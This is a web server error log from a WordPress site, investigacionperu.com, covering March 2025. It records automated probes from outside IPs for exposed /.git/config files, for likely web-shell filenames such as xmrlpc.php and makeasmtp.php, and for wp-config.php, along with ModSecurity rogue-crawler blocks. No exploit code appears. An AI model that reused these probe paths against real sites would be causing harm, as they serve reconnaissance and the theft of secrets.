(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:57:38.695934 2025] [autoindex:error] [pid 8743:tid 140143507797760] [client 172.200.234.228:51620] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:57:56.300127 2025] [autoindex:error] [pid 9340:tid 140143499405056] [client 172.200.234.228:51672] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:58:16.026213 2025] [autoindex:error] [pid 8744:tid 140143306372864] [client 172.200.234.228:51736] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:58:19.169166 2025] [autoindex:error] [pid 9340:tid 140143415478016] [client 172.200.234.228:51748] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/24 19:18:10 [error] 8672#8672: *428492 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 22:36:13 [error] 8694#8694: *431764 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 07:45:12 [error] 30532#30532: *439627 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Mar 25 09:26:16.382131 2025] [:error] [pid 31174:tid 140041611331328] [client 137.184.58.92:48802] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Tue Mar 25 09:26:30.396100 2025] [autoindex:error] [pid 31174:tid 140041670080256] [client 137.184.58.92:48838] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:26:45.766089 2025] [autoindex:error] [pid 30561:tid 140041678472960] [client 137.184.58.92:48878] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:26:47.448334 2025] [autoindex:error] [pid 30561:tid 140041686865664] [client 137.184.58.92:48884] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:26:48.429161 2025] [:error] [pid 30559:tid 140041678472960] [client 137.184.58.92:48888] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 25 09:26:51.136037 2025] [:error] [pid 30561:tid 140041628116736] [client 137.184.58.92:48896] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Tue Mar 25 09:27:04.976374 2025] [autoindex:error] [pid 31174:tid 140041703651072] [client 137.184.58.92:48932] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:27:05.001461 2025] [:error] [pid 30561:tid 140041619724032] [client 137.184.58.92:48934] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Mar 25 09:27:05.903847 2025] [:error] [pid 30561:tid 140041594545920] [client 137.184.58.92:48938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Tue Mar 25 09:27:22.955543 2025] [:error] [pid 31174:tid 140041686865664] [client 137.184.58.92:48984] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 25 09:27:25.036075 2025] [:error] [pid 30561:tid 140041602938624] [client 137.184.58.92:48992] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Tue Mar 25 09:27:28.924006 2025] [:error] [pid 30560:tid 140041808434944] [client 137.184.58.92:49004] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Tue Mar 25 09:27:36.032257 2025] [autoindex:error] [pid 31174:tid 140041586153216] [client 137.184.58.92:49024] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:27:41.428333 2025] [:error] [pid 30560:tid 140041611331328] [client 137.184.58.92:49040] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Tue Mar 25 09:27:55.518561 2025] [:error] [pid 30560:tid 140041686865664] [client 137.184.58.92:49084] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Mar 25 09:28:07.362033 2025] [:error] [pid 30561:tid 140041800042240] [client 137.184.58.92:49118] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Mar 25 09:28:07.378582 2025] [:error] [pid 31174:tid 140041611331328] [client 137.184.58.92:49120] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Mar 25 09:28:37.988448 2025] [autoindex:error] [pid 31174:tid 140041594545920] [client 137.184.58.92:49206] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:28:44.891392 2025] [autoindex:error] [pid 30559:tid 140041569367808] [client 137.184.58.92:49230] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:28:45.493147 2025] [autoindex:error] [pid 31174:tid 140041816827648] [client 137.184.58.92:49234] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:28:46.875335 2025] [:error] [pid 30561:tid 140041791649536] [client 137.184.58.92:49240] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Mar 25 09:28:46.927365 2025] [:error] [pid 30561:tid 140041686865664] [client 137.184.58.92:49242] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Mar 25 09:29:23.365066 2025] [autoindex:error] [pid 31174:tid 140041783256832] [client 137.184.58.92:49350] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:30:47.354019 2025] [:error] [pid 30559:tid 140041670080256] [client 137.184.58.92:49584] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Tue Mar 25 09:31:16.027845 2025] [autoindex:error] [pid 30560:tid 140041791649536] [client 137.184.58.92:49662] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 25 09:31:35.053345 2025] [:error] [pid 30559:tid 140041653294848] [client 137.184.58.92:49718] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Tue Mar 25 09:31:40.112080 2025] [:error] [pid 30561:tid 140041602938624] [client 137.184.58.92:49734] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dbform69.php 2025/03/25 13:29:26 [error] 30532#30532: *443865 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 13:29:45 [error] 30531#30531: *443869 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 14:42:31 [error] 30532#30532: *444431 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/25 14:42:51 [error] 30532#30532: *444438 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/25 15:09:49 [error] 30532#30532: *445015 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 15:10:03 [error] 30531#30531: *445016 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 16:11:28 [error] 30531#30531: *445442 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/25 16:11:28 [error] 30532#30532: *445443 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/25 16:37:03 [error] 30532#30532: *445683 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 16:38:46 [error] 30531#30531: *445696 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 17:37:54 [error] 30532#30532: *446142 access forbidden by rule, client: 45.148.10.98, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/25 18:21:16 [error] 30531#30531: *446366 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 18:21:35 [error] 30532#30532: *446371 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 18:27:10 [error] 30531#30531: *446447 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 18:27:10 [error] 30531#30531: *446448 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 18:51:28 [error] 30532#30532: *446537 access forbidden by rule, client: 45.148.10.98, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 18:53:16 [error] 30531#30531: *446539 access forbidden by rule, client: 45.148.10.98, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/25 18:55:09 [error] 30532#30532: *446557 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/25 18:55:09 [error] 30531#30531: *446558 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/25 19:03:41 [error] 30531#30531: *446606 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 19:06:58 [error] 30532#30532: *446643 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 19:13:58 [error] 30532#30532: *446676 access forbidden by rule, client: 5.252.155.208, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2025/03/25 19:13:59 [error] 30531#30531: *446677 access forbidden by rule, client: 5.252.155.208, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/25 19:54:20 [error] 30532#30532: *446937 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 19:54:44 [error] 30532#30532: *446938 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 20:15:25 [error] 30531#30531: *447376 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/25 20:25:31 [error] 30532#30532: *447422 access forbidden by rule, client: 45.148.10.98, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 20:59:31 [error] 30531#30531: *447696 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 20:59:31 [error] 30531#30531: *447697 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/25 21:14:00 [error] 30532#30532: *447837 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 21:14:01 [error] 30531#30531: *447838 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/25 21:17:08 [error] 30531#30531: *447850 access forbidden by rule, client: 45.148.10.98, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/25 21:36:36 [error] 30532#30532: *447944 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Mar 25 21:41:19.061900 2025] [:error] [pid 30559:tid 140041825220352] [client 54.89.122.51:59942] [client 54.89.122.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Z-NpT4ET7a0W3pdNi-sAWQAAAAA"] [Tue Mar 25 21:43:27.073075 2025] [:error] [pid 30560:tid 140041552582400] [client 54.89.122.51:60082] [client 54.89.122.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/themes/zerif-lite/js/smoothscroll.js"] [unique_id "Z-NpzzVTeFIyEIoVOvl4qAAAAFg"] 2025/03/25 23:32:58 [error] 30532#30532: *448870 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/25 23:32:58 [error] 30532#30532: *448871 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/26 01:44:26 [error] 30532#30532: *450182 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/26 01:44:27 [error] 30532#30532: *450183 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Mar 26 01:59:20.777737 2025] [:error] [pid 30561:tid 140041636509440] [client 194.61.40.64:36456] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Wed Mar 26 01:59:20.777822 2025] [:error] [pid 30561:tid 140041636509440] [client 194.61.40.64:36456] Stack trace: [Wed Mar 26 01:59:20.777836 2025] [:error] [pid 30561:tid 140041636509440] [client 194.61.40.64:36456] #0 {main} [Wed Mar 26 01:59:20.777936 2025] [:error] [pid 30561:tid 140041636509440] [client 194.61.40.64:36456] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Wed Mar 26 01:59:32.998662 2025] [autoindex:error] [pid 31174:tid 140041670080256] [client 194.61.40.64:36480] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Wed Mar 26 01:59:38.490906 2025] [autoindex:error] [pid 31174:tid 140041628116736] [client 194.61.40.64:36492] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Wed Mar 26 01:59:50.592797 2025] [autoindex:error] [pid 30559:tid 140041560975104] [client 194.61.40.64:36520] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Mar 26 01:59:56.764991 2025] [autoindex:error] [pid 31174:tid 140041611331328] [client 194.61.40.64:36536] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 26 01:59:57.869911 2025] [autoindex:error] [pid 31174:tid 140041644902144] [client 194.61.40.64:36540] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Wed Mar 26 02:00:12.746137 2025] [autoindex:error] [pid 31174:tid 140041670080256] [client 194.61.40.64:36570] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Wed Mar 26 02:00:12.969468 2025] [:error] [pid 30560:tid 140041569367808] [client 194.61.40.64:36572] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Wed Mar 26 02:00:15.510193 2025] [autoindex:error] [pid 30560:tid 140041825220352] [client 194.61.40.64:36578] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Wed Mar 26 02:00:18.150957 2025] [autoindex:error] [pid 30560:tid 140041678472960] [client 194.61.40.64:36588] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Wed Mar 26 02:00:35.150979 2025] [autoindex:error] [pid 30559:tid 140041611331328] [client 194.61.40.64:36616] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Mar 26 02:00:42.299977 2025] [autoindex:error] [pid 30561:tid 140041816827648] [client 194.61.40.64:36630] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Wed Mar 26 02:00:45.746375 2025] [autoindex:error] [pid 31174:tid 140041569367808] [client 194.61.40.64:36640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Wed Mar 26 02:00:50.568415 2025] [autoindex:error] [pid 30559:tid 140041569367808] [client 194.61.40.64:36650] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Wed Mar 26 02:00:51.752974 2025] [autoindex:error] [pid 30561:tid 140041619724032] [client 194.61.40.64:36654] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Wed Mar 26 02:00:55.022414 2025] [:error] [pid 30559:tid 140041686865664] [client 194.61.40.64:36664] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Mar 26 02:01:15.432438 2025] [autoindex:error] [pid 31174:tid 140041619724032] [client 194.61.40.64:36702] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Wed Mar 26 02:01:21.269379 2025] [autoindex:error] [pid 31174:tid 140041783256832] [client 194.61.40.64:36716] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: 